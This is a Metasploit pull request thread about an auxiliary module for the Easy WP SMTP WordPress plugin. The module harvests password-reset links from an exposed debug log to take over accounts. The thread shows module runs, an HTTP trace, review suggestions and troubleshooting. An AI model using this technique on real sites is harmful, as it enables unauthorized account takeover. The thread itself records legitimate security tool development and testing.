Wordpress 2-day: easy-wp-smtp arbitrary wordpress user password reset
rapid7/metasploit-framework pull request #14474
Opened 2020-12-08 21:52 UTC by h00die

```
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > rexploit
[*] Reloading module...

[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[+] Found debug log: /wp-content/plugins/easy-wp-smtp/5fcfd49e879f9_debug_log.txt
[*] Sending password reset for editor
[*] admin can be reset with http://1.1.1.1/wp-login.php?action=rp&key=uNIf27acCIXxtZJa2c67&login=admin
[*] admin can be reset with http://1.1.1.1/wp-login.php?action=rp&key=ZVmem6HwWrLzUoeZoaKG&login=admin
[+] editor can be reset with http://1.1.1.1/wp-login.php?action=rp&key=3Uwt8on3UlJM98YLIFYY&login=editor
[+] editor can be reset with http://1.1.1.1/wp-login.php?action=rp&key=uC1Mpyak1BTIQjMgF19O&login=editor
[*] Finished enumerating resets.  Last one most likely to succeed
[*] Scanned 1 of 1 hosts (100% complete)
```

2020-12-09 01:59 UTC, h00die commented
@smcintyre-r7 Make sure to enable debug, and configure the SMTP to work correctly, or else the items wont show up in the log.  Other than that, easy install and exploit!

2020-12-17 22:26 UTC, smcintyre-r7 commented
So I'm having trouble testing this module. It's possible it *only* affects or works on 1.4.2. I'm using 1.4.1 since the module says it's for <=1.4.2 but the project seems to have [pulled version 1.4.2](https://wordpress.org/plugins/easy-wp-smtp/advanced/).

Here are the logs of my test run with VERBOSE and HttpTrace.

<details>
<summary>Test Output</summary>

```
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > show options 

Module options (auxiliary/scanner/http/wp_easy_wp_smtp):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.159.31   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads (max one per host)
   USER       Admin            no        Username to reset the password for
   VHOST                       no        HTTP server virtual host

msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run

####################
# Request:
####################
GET / HTTP/1.1
Host: 192.168.159.31
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)


####################
# Response:
####################
HTTP/1.1 200 OK
Date: Thu, 17 Dec 2020 22:15:59 GMT
Server: Apache
X-Powered-By: PHP/7.4.12
Link: <http://192.168.159.31/wp-json/>; rel="https://api.w.org/"
X-Frame-Options: SAMEORIGIN
Vary: Cookie,Accept-Encoding
X-Mod-Pagespeed: 1.13.35.2-0
Cache-Control: max-age=0, no-cache, s-maxage=10
Content-Length: 28945
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>

<html class="no-js" lang="en-US">

	<head>

		<meta charset="UTF-8">
		<meta name="viewport" content="width=device-width, initial-scale=1.0">

		<link rel="profile" href="https://gmpg.org/xfn/11">

		<title>user&#039;s Blog! &#8211; Just another WordPress site</title>
<link rel='dns-prefetch' href='//s.w.org'/>
<link rel="alternate" type="application/rss+xml" title="user&#039;s Blog! &raquo; Feed" href="http://192.168.159.31/feed/"/>
<link rel="alternate" type="application/rss+xml" title="user&#039;s Blog! &raquo; Comments Feed" href="http://192.168.159.31/comments/feed/"/>
		<script>window._wpemojiSettings={"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/13.0.0\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/192.168.159.31\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3"}};!function(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,t),0,0),r===p.toDataURL()}function l(e){if(!s||!s.fillText)return!1;switch(s.textBaseline="top",s.font="600 32px Arial",e){case"flag":return!c([127987,65039,8205,9895,65039],[127987,65039,8203,9895,65039])&&(!c([55356,56826,55356,56819],[55356,56826,8203,55356,56819])&&!c([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]));case"emoji":return!c([55357,56424,8205,55356,57212],[55357,56424,8203,55356,57212])}return!1}function d(e){var t=a.createElement("script");t.src=e,t.defer=t.type="text/javascript",a.getElementsByTagName("head")[0].appendChild(t)}for(i=Array("flag","emoji"),t.supports={everything:!0,everythingExceptFlag:!0},o=0;o<i.length;o++)t.supports[i[o]]=l(i[o]),t.supports.everything=t.supports.everything&&t.supports[i[o]],"flag"!==i[o]&&(t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&t.supports[i[o]]);t.supports.everythingExceptFlag=t.supports.everythingExceptFlag&&!t.supports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything||(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(r=t.source||{}).concatemoji?d(r.concatemoji):r.wpemoji&&r.twemoji&&(d(r.twemoji),d(r.wpemoji)))}(window,document,window._wpemojiSettings);</script>
		<style>img.wp-smiley,img.emoji{display:inline!important;border:none!important;box-shadow:none!important;height:1em!important;width:1em!important;margin:0 .07em!important;vertical-align:-.1em!important;background:none!important;padding:0!important}</style>
	<link rel='stylesheet' id='wp-block-library-css' href='http://192.168.159.31/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' media='all'/>
<link rel='stylesheet' id='email-subscribers-css' href='http://192.168.159.31/wp-content/plugins/email-subscribers/public/css/email-subscribers-public.css' media='all'/>
<link rel='stylesheet' id='ee-simple-file-list-css-css' href='http://192.168.159.31/wp-content/plugins/simple-file-list/css/eeStyles.css?ver=5' media='all'/>
<link rel='stylesheet' id='twentytwenty-style-css' href='http://192.168.159.31/wp-content/themes/twentytwenty/style.css?ver=1.5' media='all'/>
<style id='twentytwenty-style-inline-css'>.color-accent,.color-accent-hover:hover,.color-accent-hover:focus,:root .has-accent-color,.has-drop-cap:not(:focus):first-letter,.wp-block-button.is-style-outline,a {color:#cd2653}blockquote,.border-color-accent,.border-color-accent-hover:hover,.border-color-accent-hover:focus{border-color:#cd2653}button,.button,.faux-button,.wp-block-button__link,.wp-block-file .wp-block-file__button,input[type="button"],input[type="reset"],input[type="submit"],.bg-accent,.bg-accent-hover:hover,.bg-accent-hover:focus,:root .has-accent-background-color,.comment-reply-link{background-color:#cd2653}.fill-children-accent,.fill-children-accent *{fill:#cd2653}body,.entry-title a,:root .has-primary-color{color:#000}:root .has-primary-background-color{background-color:#000}cite,figcaption,.wp-caption-text,.post-meta,.entry-content .wp-block-archives li,.entry-content .wp-block-categories li,.entry-content .wp-block-latest-posts li,.wp-block-latest-comments__comment-date,.wp-block-latest-posts__post-date,.wp-block-embed figcaption,.wp-block-image figcaption,.wp-block-pullquote cite,.comment-metadata,.comment-respond .comment-notes,.comment-respond .logged-in-as,.pagination .dots,.entry-content hr:not(.has-background),hr.styled-separator,:root .has-secondary-color {color:#6d6d6d}:root .has-secondary-background-color{background-color:#6d6d6d}pre,fieldset,input,textarea,table,table *,hr{border-color:#dcd7ca}caption,code,code,kbd,samp,.wp-block-table.is-style-stripes tbody tr:nth-child(odd),:root .has-subtle-background-background-color {background-color:#dcd7ca}.wp-block-table.is-style-stripes{border-bottom-color:#dcd7ca}.wp-block-latest-posts.is-grid li{border-top-color:#dcd7ca}:root .has-subtle-background-color{color:#dcd7ca}body:not(.overlay-header) .primary-menu > li > a,body:not(.overlay-header) .primary-menu > li > .icon,.modal-menu a,.footer-menu a, .footer-widgets a,#site-footer .wp-block-button.is-style-outline,.wp-block-pullquote:before,.singular:not(.overlay-header) .entry-header a,.archive-header a,.header-footer-group .color-accent,.header-footer-group .color-accent-hover:hover {color:#cd2653}.social-icons a,#site-footer button:not(.toggle),#site-footer .button,#site-footer .faux-button,#site-footer .wp-block-button__link,#site-footer .wp-block-file__button,#site-footer input[type="button"],#site-footer input[type="reset"],#site-footer input[type="submit"] {background-color:#cd2653}.header-footer-group,body:not(.over [...]

2020-12-17 22:28 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
> +      fail_with Failure::NotVulnerable, 'Easy WP SMTP'
```suggestion
      fail_with Failure::NotVulnerable, 'A vulnerable version of the "Easy WP SMTP" plugin was not found'
```

2020-12-18 14:15 UTC, smcintyre-r7 requested changes

2020-12-18 14:15 UTC, smcintyre-r7 commented on modules/auxiliary/scanner/http/wp_easy_wp_smtp.rb
> +    unless />(?<debug_log>\w{5,15}_debug_log\.txt)/ =~ res.body
I had to modify this to work for my environment to:
```suggestion
    unless />\s*(?<debug_log>\w{5,15}_debug_log\.txt)/ =~ res.body
```

2020-12-18 14:20 UTC, smcintyre-r7 commented
Alright, so the issue with my testing was that the debug log isn't created until a password reset takes place. I was therefore getting false negatives because the debug log wasn't present even though the install and configuration were all vulnerable.

I think what might be a bit better is determining if directory listing is enabled and if so attempt the reset anyways to see if it can be created.

Once I had the setup working I was able to confirm that 1.4.3 does fix the issue, looks like the directory listing doesn't work anymore.

2020-12-18 22:04 UTC, smcintyre-r7 commented
Looks like it's working great now. I just tested the AGGRESSIVE mode too, I also received the error about the site not being configured to reset passwords before I remembered to turn my debug SMTP server on.

<details>
<summary>Testing Output</summary>

```
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > show options 

Module options (auxiliary/scanner/http/wp_easy_wp_smtp):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   AGGRESSIVE  false            no        Proceed if debug file not found
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.159.31   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path to the wordpress application
   THREADS     1                yes       The number of concurrent threads (max one per host)
   USER        smcintyre        no        Username to reset the password for
   VHOST                        no        HTTP server virtual host

msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run

[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[*] Checking for debug_log file
[-] not-vulnerable: Either debug log not turned on, or directory listings disabled.  Try AGGRESSIVE mode if this is a false positive
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > set AGGRESSIVE true
AGGRESSIVE => true
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run

[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[*] Checking for debug_log file
[-] Debug file not found, bypassing check due to AGGRESSIVE mode
[*] Sending password reset for smcintyre
[*] Checking for debug_log file
[+] Debug log saved to /home/smcintyre/.msf4/loot/20201218170110_default_192.168.159.31_5fdcb6df4e5c0_de_472780.txt.  Manual review for possible SMTP password, and other information.
[+] smcintyre password reset: http://192.168.159.31/wp-login.php?action=rp&key=U3ELnnvYWBjuz1ut62UP&login=smcintyre
[*] Finished enumerating resets.  Last one most likely to succeed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run

[*] Checking /wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[*] Checking for debug_log file
[+] Found debug log: /wp-content/plugins/easy-wp-smtp/5fdcb6df4e5c0_debug_log.txt
[*] Sending password reset for smcintyre
[+] Debug log saved to /home/smcintyre/.msf4/loot/20201218170113_default_192.168.159.31_5fdcb6df4e5c0_de_187819.txt.  Manual review for possible SMTP password, and other information.
[+] smcintyre password reset: http://192.168.159.31/wp-login.php?action=rp&key=U3ELnnvYWBjuz1ut62UP&login=smcintyre
[+] smcintyre password reset: http://192.168.159.31/wp-login.php?action=rp&key=ZNwfwdXfHMF6VsmD9P86&login=smcintyre
[*] Finished enumerating resets.  Last one most likely to succeed
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > 
```
</details>

I'll land this in a moment, I just made some minor grammar/spelling changes. Thanks @h00die!

2020-12-18 22:08 UTC, merged

2021-02-05 14:34 UTC, hackercoolmagz commented
I am unable to successfully execute this module. When I execute this module, my output is

msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run

[*] Checking /wordpress5.4/wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[*] Checking for debug_log file
[-] not-vulnerable: Either debug log not turned on, or directory listings disabled.  Try AGGRESSIVE mode if this is a false positive
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

When I set aggressive option to true, this is my output.

msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > set aggressive true
aggressive => true
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run

[*] Checking /wordpress5.4/wp-content/plugins/easy-wp-smtp/readme.txt
[*] Found version 1.4.1 in the plugin
[+] Vulnerable version detected
[*] Checking for debug_log file
[-] Debug file not found, bypassing check due to AGGRESSIVE mode
[*] Sending password reset for admin
[-] not-vulnerable: Site not configured to submit new password request
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > 


Can I know what is the mistake I am doing.

2021-02-05 14:35 UTC, hackercoolmagz commented
Sorry. I forgot to inform that the debug is enabled.

2021-02-05 14:47 UTC, bcoles commented
> When I set aggressive option to true, this is my output.
> 
> msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > set aggressive true
> aggressive => true
> msf6 auxiliary(scanner/http/wp_easy_wp_smtp) > run
> 
> [_] Checking /wordpress5.4/wp-content/plugins/easy-wp-smtp/readme.txt [_] Found version 1.4.1 in the plugin
> [+] Vulnerable version detected
> [_] Checking for debug_log file [-] Debug file not found, bypassing check due to AGGRESSIVE mode [_] Sending password reset for admin
> [-] not-vulnerable: Site not configured to submit new password request
> [_] Scanned 1 of 1 hosts (100% complete) [_] Auxiliary module execution completed
> msf6 auxiliary(scanner/http/wp_easy_wp_smtp) >
> 
> Can I know what is the mistake I am doing.

You received a message indicating that the target is not vulnerable:

```
not-vulnerable: Site not configured to submit new password request
```

This message is returned when the response body includes the string `The email could not be sent` :

```ruby
fail_with Failure::NotVulnerable, 'Site not configured to submit new password request' if res.body.include?('The email could not be sent')
```

Presumably this means that an email could not be sent.

Perhaps the application has broken mail configuration settings. Or perhaps the email associated with the `admin` user is malformed. You could try a different user with `set USER`.

2021-02-05 15:08 UTC, hackercoolmagz commented
Thank You for your help again.

2021-02-05 15:44 UTC, h00die commented
`admin` may also not be a valid user. I don't remember if there was a difference in error message between no valid user and not configured for password reset